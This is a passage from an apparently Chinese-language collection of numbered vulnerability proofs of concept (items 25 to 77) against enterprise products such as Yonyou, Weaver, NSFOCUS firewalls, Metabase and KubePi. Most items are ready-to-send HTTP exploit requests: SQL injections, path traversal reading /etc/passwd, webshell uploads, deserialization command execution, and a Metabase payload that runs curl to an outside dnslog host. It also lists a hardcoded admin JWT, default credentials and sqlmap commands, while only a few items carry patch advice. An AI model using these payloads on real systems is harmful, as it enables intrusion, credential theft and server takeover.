GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1
Host: 127.0.0.1:7443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close25、大华智慧园区综合管理平台 文件上传漏洞
POST /publishing/publishing/material/file/video HTTP/1.1
Host: 127.0.0.1:7443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 804
Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7
Accept-Encoding: gzip, deflate
Connection: close
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Filedata"; filename="0EaE10E7dF5F10C2.jsp"
<%@page contentType="text/html; charset=GBK"%><%@page import="java.math.BigInteger"%><%@page import="java.security.MessageDigest"%><% MessageDigest md5 = null;md5 = MessageDigest.getInstance("MD5");String s = "123456";String miyao = "";String jiamichuan = s + miyao;md5.update(jiamichuan.getBytes());String md5String = new BigInteger(1, md5.digest()).toString(16);out.println(md5String);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="poc"
poc
--dd8f988919484abab3816881c55272a7
Content-Disposition: form-data; name="Submit"
submit
--dd8f988919484abab3816881c55272a7--26、用友时空KSOA PayBill SQL注入漏洞
POST /servlet/PayBill?caculate&_rnd= HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 134
Accept-Encoding: gzip, deflate
Connection: close
<?xml version="1.0" encoding="UTF-8" ?><root><name>1</name><name>1'WAITFOR DELAY '00:00:03';-</name><name>1</name><name>102360</name></root>27、绿盟 SAS堡垒机 local_user.php 任意用户登录漏洞
GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close28、某盟 SAS堡垒机 GetFile 任意文件读取漏洞 POC
GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close29、某盟 SAS堡垒机 Exec 远程命令执行漏洞
GET /webconf/Exec/index?cmd=wget%20xxx.xxx.xxx HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close30、某友 移动管理系 统 uploadApk.do 任意文件上传漏洞
POST /maportal/appmanager/uploadApk.do?pk_obj=0001A1100000000H66QB HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 198
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=4ABE9DB29CA45044BE1BECDA0A25A091.server
Connection: close
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3
Content-Disposition: form-data; name="downloadpath"; filename="a.jsp"
Content-Type: application/msword
hello
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3-- 31、启明天钥安全网关前台sql注入
POST /ops/index.php?c=Reportguide&a=checkrn HTTP/1.1
Host: ****
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="88", "Google Chrome";v="88", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Language: zh-CN,zh;q=0.9
Cookie: ****
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
checkname=123&tagid=123
sqlmap -u "https://****/ops/index.php?c=Reportguide&a=checkrn" --data "checkname=123&tagid=123" -v3 --skip-waf --random-agent32、用友M1server反序列化命令执行漏洞
漏洞描述:
M1移动协同是针对管理者、高端商务人士、长期在外走访客户的业务人员以及日常外出的行业者而打造的协同应用。该应用平台存在反序列化漏洞,攻击者构造恶意包可以执行任意命令获取服务器权限
POC待补充
33、启明星辰-4A 统一安全管控平台 getMater 信息泄漏
漏洞描述:
启明星辰集团4A统一安全管控平台实现IT资源集中管理,为企业提供集中的账号、认证、授权、审计管理技术支撑及配套流程,提升系统安全性和可管理能力。可获取相关人员敏感信息。
GET /accountApi/getMaster.do HTTP/1.1
Host: [你的主机名或IP地址]
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.881.36 Safari/537.36poc:
relative: req0
session: false
requests:
- method: GET
timeout: 10
path: /accountApi/getMaster.do
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/65.0.881.36 Safari/537.36
follow_redirects: true
matches: (code.eq("200") && body.contains("\"state\":true"))34、锐捷交换机 WEB 管理系统 EXCU_SHELL 信息泄露
漏洞描述:锐捷交换机 WEB 管理系统 EXCU_SHELL 信息泄露漏洞
批量扫描工具:
https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/unauthorized/%E9%94%90%E6%8D%B7%E4%BA%A4%E6%8D%A2%E6%9C%BAWEB%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9FEXCU_SHELL
POC
GET /EXCU_SHELL HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.2852.74 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: /
Connection: close
Cmdnum: '1'
Command1: show running-config
Confirm1: n35、科荣 AIO 管理系统存在文件读取漏洞
漏洞描述:
科荣AIO企业一体化管理解决方案,通过ERP(进销存财务)、OA(办公自动化)、CRM(客户关系管理)、UDP(自定义平台),集电子商务平台、支付平台、ERP平台、微信平台、移动APP等解决了众多企业客户在管理过程中跨部门、多功能、需求多变等通用及个性化的问题。科荣 AIO 管理系统存在文件读取漏洞,攻击者可以读取敏感文件。
POC待补充
36、飞企互联 FE 业务协作平台 magePath 参数文件读取漏洞
漏洞描述:
FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联 FE 业务协作平台存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件获取大量敏感信息。
漏洞影响 :
飞企互联 FE业务协作平台
网络测绘:
“flyrise.stopBackspace.js”
漏洞复现 :
登陆页面
验证POC
/servlet/ShowImageServlet?imagePath=../web/fe.war/WEB-INF/classes/jdbc.properties&print37、用友GRP-U8存在信息泄露
漏洞描述:友U8系统存可直接访问log日志,泄露敏感信息
批量扫描工具:
https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/unauthorized/%E7%94%A8%E5%8F%8BGRP-U8
GET /logs/info.log HTTP/1.138、nginx配置错误导致的路径穿越风险
漏洞自查PoC如下:
https://github.com/hakaioffsec/navgix该漏洞非0day,是一个路径穿越漏洞,可以直接读取nginx后台服务器文件。
有多家重点金融企业已中招,建议尽快进行自查。
39、红帆OA zyy_AttFile.asmx SQL注入漏洞
POST /ioffice/prg/interface/zyy_AttFile.asmx HTTP/1.1
Host: 10.250.250.5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 383
Content-Type: text/xml; charset=utf-8
Soapaction: "http://tempuri.org/GetFileAtt"
Accept-Encoding: gzip, deflate
Connection: close
<?xml version="1.0" encoding="utf-8"?><soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><GetFileAtt
xmlns="http://tempuri.org/"><fileName>123</fileName></GetFileAtt> </soap:Body></so
ap:Envelope>修复方法
官方已发布安全修复版本,请升级至官网最新版本
https://www.ioffice.cn/
40、Coremail 邮件系统未授权访问获取管理员账密
/coremail/common/assets/:/:/:/:/:/:/s?
biz=Mzl3MTk4NTcyNw==&mid=2247485877&idx=1&sn=7e5f77db320ccf9013c0b7aa7262
6688chksm=eb3834e5dc4fbdf3a9529734de7e6958e1b7efabecd1c1b340c53c80299ff5c688b
f6adaed61&scene=241、Milesight VPN server.js 任意文件读取漏洞
GET /../etc/passwd HTTP/1.1
Host:
Accept: /
Content-Type: application/x-www-form-urlencoded42、PigCMS action_flashUpload 任意文件上传漏洞
POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload
HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----aaa
------aaa
Content-Disposition: form-data; name="filePath"; filename="test.php"
Content-Type: video/x-flv
<?php phpinfo();?>
------aaa
/cms/upload/images/2023/08/11/1691722887xXbx.php43、绿盟 NF 下一代防火墙 任意文件上传漏洞
POST /api/v1/device/bugsInfo HTTP/1.1
Content-Type: multipart/form-data; boundary=4803b59d015026999b45993b1245f0ef
Host:
--4803b59d015026999b45993b1245f0ef
Content-Disposition: form-data; name="file"; filename="compose.php"
<?php eval($_POST['cmd']);?>
--4803b59d015026999b45993b1245f0ef--
POST /mail/include/header_main.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID_NF=82c13f359d0dd8f51c29d658a9c8ac71
Host:
cmd=phpinfo();44、金盘图书馆微信管理后台 getsysteminfo 未授权访问漏洞
/admin/weichatcfg/getsysteminfo漏洞描述:北京金盘鹏图软件技术有限公司的金盘图书馆微信管理后台 getsysteminfo 存在未授权访问漏洞
漏洞危害:获取管理员账号密码等敏感数据,导致攻击者能以管理员身份进入系统窃取敏感信息和危险操作
修复方法:
官方已发布安全修复版本,请升级至官网最新版本
http://goldlib.com.cn/
45、Panel loadfile 后台文件读取漏洞
POST /api/v1/file/loadfile HTTP/1.1
Host: [你的主机名或IP地址]
Content-Type: application/json
Content-Length: [请求体长度,以字节为单位]
{"paht":"/etc/passwd"}46、网御 ACM 上网行为管理系统bottomframe.cgi SQL 注入漏洞
GET /bottomframe.cgi?user_name=%27))%20union%20select%20md5(1)%23 HTTP/1.1
Host: [你的主机名或IP地址]漏洞复现
登录页面
47、广联达 Linkworks GetIMDictionarySQL 注入漏洞
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --48、用友文件服务器认证绕过
资产搜索:
app="用友-NC-Cloud"
或者是app="用友-NC-Cloud" && server=="Apache-Coyote/1.1"
POST数据包修改返回包 false改成ture就可以绕过登陆
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Thu, 10 Aug 2023 20:38:25 GMT
Connection: close
Content-Length: 17
{"login":"false"}
49、华天动力oa SQL注入
访问
http://xxxx//report/reportJsp/showReport.jsp?raq=%2FJourTemp2.raq&reportParamsId=100xxx
然后抓包
POST /report/reportServlet?action=8 HTTP/1.1
Host: xxxx
Content-Length: 145
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://xxx/
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://xxxx/report/reportJsp/showReport.jsp?raq=%2FJourTemp2.raq&reportParamsId=100xxx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=D207AE96056400942620F09D34B8CDF3
Connection: close
year=*&userName=*&startDate=*&endDate=*&dutyRule=*&resultPage=%2FreportJsp%2FshowRepo50、泛微 Weaver E-Office9 前台文件包含
http://URL/E-mobile/App/Init.php?weiApi=1&sessionkey=ee651bec023d0db0c233fcb562ec7673_admin&m=12344554_../../attachment/xxx.xls51、企业微信(私有化版本)敏感信息泄露漏洞
紧急通知,长亭报出企业微信存在信息泄露0day!目前已在准备预警,请注意!
企业微信URL/cgi-bin/gateway/agentinfo
接口未授权情况下可直接获取企业微信secret等敏感信息
受影响版本:2.5.x、2.6.930000、以下;
不受影响:2.7.x、2.8.x、2.9.x;
危害:
1、可导致企业微信全量数据被获取、文件获取,
2、存在使用企业微信轻应用对内发送钓鱼文件和链接等风险。
修复方法:
1、在waf上设置一个规则,匹配到/cgi-bin/gateway/agentinfo路径的进行阻断;
2、联系厂家进行获取修复包;
3、官方通报及补丁地址
复现及漏洞详情分析:
第一步:,通过泄露信息接口可以获取corpid和corpsecret
https://<企业微信域名>/cgi-bin/gateway/agentinfo
第二步,使用corpsecret和corpid获得token
https://<企业微信域名>/cgi-bin/gettoken?corpid=ID&corpsecret=SECRET
第三步,使用token访问诸如企业通讯录信息,修改用户密码,发送消息,云盘等接口
https://<企业微信域名>/cgi-bin/user/get?access_token=ACCESS_TOKEN&userid=USERID
52、帆软报表系统漏洞威胁
情况说明:帆软报表系统(V10、V11及更早期版本)存在反序列化漏洞绕过、反序列化命令执行等高危漏洞,攻击者可利用上述漏洞获取系统权限。鉴于该漏洞影响范围较大,潜在危害程度极高,建议引起高度重视,通过官方发布的链接下载补丁,进行升级,消除安全隐患,提高安全防范能力。
漏洞详细信息: https://help.fanruan.com/finereport/doc-view-4833.html
补丁下载链接: http: //s.fanruan.com/3u6eo
53、蓝凌EKP远程代码执行漏洞
受影响版本:
蓝凌EKP V16 (最新版)受影响存在远程代码执行漏洞;V15暂无环境验证,可能受影响。
修复方案:
使用网络ACL限制该OA的访问来源,加强监测,重点拦截GET请求中带有../等目录穿越特征的URL。
通过文件上传-->解压-->获取webshell,前台漏洞
漏洞路径:
Plaintext
/api///sys/ui/sys_ui_extend/sysUiExtend.do
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: /
Connection: Keep-Alive
Content-Length: 42
Content-Type: application/x-www-form-urlencoded
var={"body":{"file":"file:///etc/passwd"}}54、Smartx超融合远程命令执行漏洞
SmartX超融合系统是构建超融合平台的核心软件,能够基于不同虚拟化平台和软硬件的交付方式实现超融合架构。Smartx超融合系统存在远程命令执行漏洞,攻击者可利用该漏洞执行任意命令,控制服务器。
受影响版本:Smartx超融合version <= 5.0.5受影响存在漏洞;最新版暂无环境验证,可能受影响。
修复方案:使用网络ACL限制该产品的访问来源,加强监测,重点拦截GET请求中带有操作系统命令注入特征的URL;
临时修复方案:
重点拦截访问 /api/v2/deployment/can_ping的可疑ip
55、Nacos-Sync未授权漏洞
https://xxx.xxx.xxx/#/serviceSync56、360 新天擎终端安全管理系统信息泄露漏洞
http://ip:port/runtime/admin_log_conf.cache57、锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞
POST /ddi/server/fileupload.php?uploadDir=../../321&name=123.php HTTP/1.1
Host:
Accept: text/plain, */*; q=0.01
Content-Disposition: form-data; name="file"; filename="111.php"
Content-Type: image/jpeg
<?php phpinfo();?>58、Openfire身份认证绕过漏洞(CVE-2023-32315)
GET /user-create.jsp?csrf=Sio3WOA89y2L9Rl&username=user1&name=&email=&password=Qwer1234&passwordConfirm=Qwer1234&isadmin=on&create=............ HTTP/1.159、泛微 ShowDocsImagesql注入漏洞
GET
/weaver/weaver.docs.docs.ShowDocsImageServlet?docId=* HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
like Gecko)
Accept-Encoding: gzip, deflate
Connection: close60、宏景 HCM codesettree SQL 注入漏洞
GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20al
l~20select~20~27~31~27~2cusername~20from~20operuser~20~2d~2d HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
like Gecko)
Accept-Encoding: gzip, deflate
Connection: close61、用友时空 KSOATaskRequestServlet sql注入漏洞
/servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet?unitid=1*&password=1,62、用友时空 KSOA servletimagefield 文件 sKeyvalue 参数SQL 注入
GET /servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1'+union+select+sys.fn_varbintohexstr(hashbytes('md5','test'))--+ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)
Accept-Encoding: gzip, deflate
Connection:63、用友畅捷通 T注入
sqlmap -u http://xx.xx.xx.xx/WebSer~1/create_site.php?site_id=1 --is-dba64、宏景OA文件上传
POST /w_selfservice/oauthservlet/%2e./.%2e/system/options/customreport/OfficeServer.jsp HTTP/1.1
Host: xx.xx.xx.xx
Cookie: JSESSIONID=C92F3ED039AAF958516349D0ADEE426E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 417
DBSTEP V3.0 351 0 666 DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
FILETYPE=Li5cMW5kZXguanNw
RECOR1DID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
1
shell:http://xx.xx.xx.xx/1ndex.jsp65、金和OA 未授权
漏洞链接
http://xx.xx.xx.xx/C6/Jhsoft.Web.users/GetTreeDate.aspx/?id=1复现步骤
http://xx.xx.xx.xx/C6/Jhsoft.Web.users/GetTreeDate.aspx/?id=1%3bWAITFOR+DELAY+'0%3a0%3a5'+--%20and%201=166、Kuboard默认口令
漏洞描述:
Kuboard,是一款免费的 Kubernetes 图形化管理工具,Kuboard 力图帮助用户快速在 Kubernetes 上落地微服务。Kuboard存在默认口令可以通过默认口令登录Kuboard,管理Kubernetes。
admin/kuboard123
67、QAX-Vpn存在x遍历及任意账号密码修改漏洞
https://x.xxx.xxx.cn/admin/group/xgroupphp?id=1
https://x.xxx.xxx.cn/admin/group/xgroupphp?id=3
cookie: admin id=1; gw admin ticket=1;68、有用畅捷通T+GetStoreWarehouseByStore RCE漏洞
POST /tplus/ajaxpro/Ufida.T.CodeBehind.PriorityLevel,AppCode.ashx?method=GetstoreWarehouseByStore HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11;Linuxx86 64)AppleWebKit/537.36(KHTML, likeGecko)Chrome/34.0.1847.137 Safari 4E423F
Connection: close
Content-Length:668 X-Ajaxpro-Method:GetstoreWarehouseByStore
Accept-Encoding:gzip { "storeID":{"type":"system.Windows.Data.objectDataProvider,PresentationFramework,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35", "MethodName":"start","objectInstance":{" type":"system.Diagnostics.Process, System,Version=4.0.0.0,Culture=neutral, PublicKeyToken=b77a5c561934e089" "startInfo":{" type":"system.Diagnostics.ProcessstartInfo, system,Version=4.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089","FileName":"cmd", "Arguments":"/cwhoami>C:/Progra~2/Chanjet/TPlusStd/Website/2RUsL6jgx9sGX4GItBcVfxarBM.txt" } } } }69、契约锁电子签章系统 RCE
POST /callback/%2E%2E;/code/upload HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type:multipart/form-data;
boundary=----GokVTLZMRxcJWKfeCvEsYHlszxE
----GokVTLZMRxcJWKfeCvEsYHlszxE
Content-Disposition: form-data; name="type";
TIMETASK
----GokVTLZMRxcJWKfeCvEsYHlszxE
Content-Disposition: form-data; name="file"; filename="qys.jpg"
马儿
----GokVTLZMRxcJWKfeCvEsYHlszxE70、任我行 CRM SmsDataList SQL注入漏洞
POST /SMS/SmsDataList/?pageIndex=1&pageSize=30 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.1361.63 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 170
Keywords=&StartSendDate=2020-06-17&EndSendDate=2020-09-17&SenderTypeId=00000000*71、深信服数据中心管理系统sangforindex XML 实体注入漏洞
GET /src/sangforindex HTTP/1.1
Host: ip:port
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko)
Accept:
text/xml,application/xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: text/xml
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: Keep-alive
Content-Length: 135
<?xml version="1.0" encoding="utf-8" ?><!DOCTYPE root [
<!ENTITY rootas SYSTEM "http://dnslog">
]>
<xxx>
&rootas;
</xxx>72、明源云 ERP ApiUpdate.ashx 文件上传漏洞
POST /myunke/ApiUpdateTool/ApiUpdate.ashx?apiocode=a HTTP/1.1
Host: target.com
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3)AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 856
{{unquote("PK\x03\x04\x14\x00\x00\x00\x08\x00\xf2\x9a\x0bW\x97\xe9\x8br\x8c\x00\x00\x00\x93\x00\x00\x00\x1e\x00\x00\x00../../../fdccloud/_/check.aspx$\xcc\xcb\x0a\xc20\x14\x04\xd0_\x09\x91B\xbb\x09\x0a\xddH\xab\x29\x8aP\xf0QZ\xc4\xf5m\x18j!ib\x1e\x82\x7fo\xc4\xdd0g\x98:\xdb\xb1\x96F\xb03\xcdcLa\xc3\x0f\x0b\xce\xb2m\x9d\xa0\xd1\xd6\xb8\xc0\xae\xa4\xe1-\xc9d\xfd\xc7\x07h\xd1\xdc\xfe\x13\xd6%0\xb3\x87x\xb8\x28\xe7R\x96\xcbr5\xacyQ\x9d&\x05q\x84B\xea\x7b\xb87\x9c\xb8\x90m\x28<\xf3\x0e\xaf\x08\x1f\xc4\xdd\x28\xb1\x1f\xbcQ1\xe0\x07EQ\xa5\xdb/\x00\x00\x00\xff\xff\x03\x00PK\x01\x02\x14\x03\x14\x00\x00\x00\x08\x00\xf2\x9a\x0bW\x97\xe9\x8br\x8c\x00\x00\x00\x93\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00../../../fdccloud/_/check.aspxPK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00L\x00\x00\x00\xc8\x00\x00\x00\x00\x00")}}73、泛微 HrmCareerApplyPerView S Q L 注入漏洞
GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(db_name()),db_name(1),5,6,7 HTTP/1.1
Host: 127.0.0.1:7443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)
Accept-Encoding: gzip, deflate
Connection: close74、Metabase validate 远程命令执行漏洞(CVE-2023-38646)
漏洞描述
Metabase是一个开源的数据分析和可视化工具,它可以帮助用户轻松连接到各种数据源,包括数据库、云服务和API,然后使用绘图的界面进行数据查询、分析和可视化。需身份认证的远程攻击者利用该漏洞可以在服务器上以运行元数据库服务器的权限执行任意命令
漏洞影响
元数据库
网络测绘
应用程序=“元数据库”
漏洞复现
登录页面
POC
/api/session/properties
GET请求 /api/session/properties
相应包中包含setup-token字段
后用获取到的token发送post数据包:
POST /api/setup/validate HTTP/1.1
Host:
Content-Type: application/json
Content-Length: 812
{
"token": "获取的token",
"details":
{
"is_on_demand": false,
"is_full_sync": false,
"is_sample": false,
"cache_ttl": null,
"refingerprint": false,
"auto_run_queries": true,
"schedules":
{},
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('curl ecw14d.dnslog.cn')\n$$--=x",
"advanced-options": false,
"ssl": true
},
"name": "an-sec-research-team",
"engine": "h2"
}
}
75、KubePi JwtSigKey 登陆绕过漏洞(CVE-2023-22463)
漏洞描述
KubePi 中存在 JWT 硬编码,攻击者通过硬编码可以获取服务器后台管理权限,添加任意用户
漏洞影响:
库贝派
网络测绘:
“库贝皮”
漏洞复现
登陆页面
POST /kubepi/api/v1/users HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.127 Safari/537.36
accept: application/json
Accept-Encoding: gzip, deflate
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfX0.XxQmyfq_7jyeYvrjqsOZ4BB4GoSkfLO2NvbKCEQjld8
{
"authenticate": {
"password": "{{randstr}}"
},
"email": "{{randstr}}@qq.com",
"isAdmin": true,
"mfa": {
"enable": false
},
"name": "{{randstr}}",
"nickName": "{{randstr}}",
"roles": [
"Supper User"
]76、禅道 16.5 router.class.php SQL注入漏洞
POST /user-login.html
account=admin%27+and+%28select+extractvalue%281%2Cconcat%280x7e%2C%28select+user%28%29%29%2C0x7e%29%29%29%2377、金山EDR RCE漏洞
开启⽇志 /Console/inter/handler/change_white_list_cmd.php id参数
POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1
Host: *.*.*.*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101Firefox/114.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 131
Origin: http://*.*.*.*
Connection: close
Referer: http://*.*.*.*/settings/system/user.php?m1=7&m2=0
{"change_white_list_cmd":{"ip":"{BD435CCE-3F91EC}","name":"3AF264D9-AE5A","id":"111;set//global//general_log=on;","type":"0"}}
设置日志php文件
POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1
Host: *.*.*.*
Content-Length: 195
Accept: */*
X-Requested-With: XMLHttpRequest
